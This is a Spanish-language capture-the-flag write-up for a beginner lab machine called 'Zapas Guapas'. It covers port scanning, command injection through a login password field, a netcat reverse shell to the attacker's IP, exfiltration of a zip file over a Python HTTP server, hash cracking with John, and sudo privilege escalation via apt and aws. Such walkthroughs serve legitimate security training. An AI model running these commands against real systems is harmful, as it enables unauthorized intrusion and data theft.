Zapas Guapas
🔍 Dificultad: Principiante
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.70
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -sVC -p- -n --min-rate 5000 192.168.1.70
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 192.168.1.70
para obtener más información sobre ese puerto específicamente.

Seguimos indagando más sobre los puertos y ahora exploramos el servicio HTTP. Ingresamos la IP y nos encontramos la página de una tienda de zapatillas.

Ahora buscaremos directorios con la herramienta Gobuster a través de:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://192.168.1.68
Vemos que hay un archivo login.html
que revisaremos.

Probando varias opciones me he dado cuenta que hay una ejecución remota de comandos por lo que a poner cualquier usuario y añadir en el campo contraseña el comando:
cat /etc/passwd
Nos damos cuenta de 3 usuarios root, pronike y proadidas. Voy a realizar una Reverse Shell.
busybox nc 192.168.1.50 443 -e sh
Tras ponerme en escucha y realizar tratamiento de la TTY. Como se nos muestra aquí: Tratamiento de la TTY. Indagando en el usuario pronike encontramos un archivo nota.txt
.

También encontramos en el directorio /opt
un zip que nos descargamos a nuestra máquina local.
En la máquina víctima
python3 -m http.server 8080
En la máquina atacante
wget http://192.168.1.70:8080/importante.zip

🚀 EXPLOTACIÓN
Ahora realizamos fuerza bruta.
zip2john importante.zip > hash_zip
john hash_zip --wordlist=/usr/share/wordlists/rockyou.txt

Obtenemos la contraseña para descomprimir el .zip.

ssh pronike@192.168.1.70

🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.

Tenemos permisos sudo en apt. Para más detalles, visitamos GTFObins - apt.

Repetimos el proceso, por lo que hacemos:
sudo -l

Tenemos permisos sudo en aws. Para más detalles, visitamos GTFObins - AWS

Te deseo mucho éxito en tu búsqueda de las flags! Recuerda prestar atención a cada detalle, examinar los archivos y servicios con detenimiento, y utilizar todas las herramientas disponibles para encontrarlas. La clave para el éxito está en la perseverancia y en no dejar ningún rincón sin explorar. ¡Adelante, hacker! 💻🔍🚀
Last updated
Was this helpful?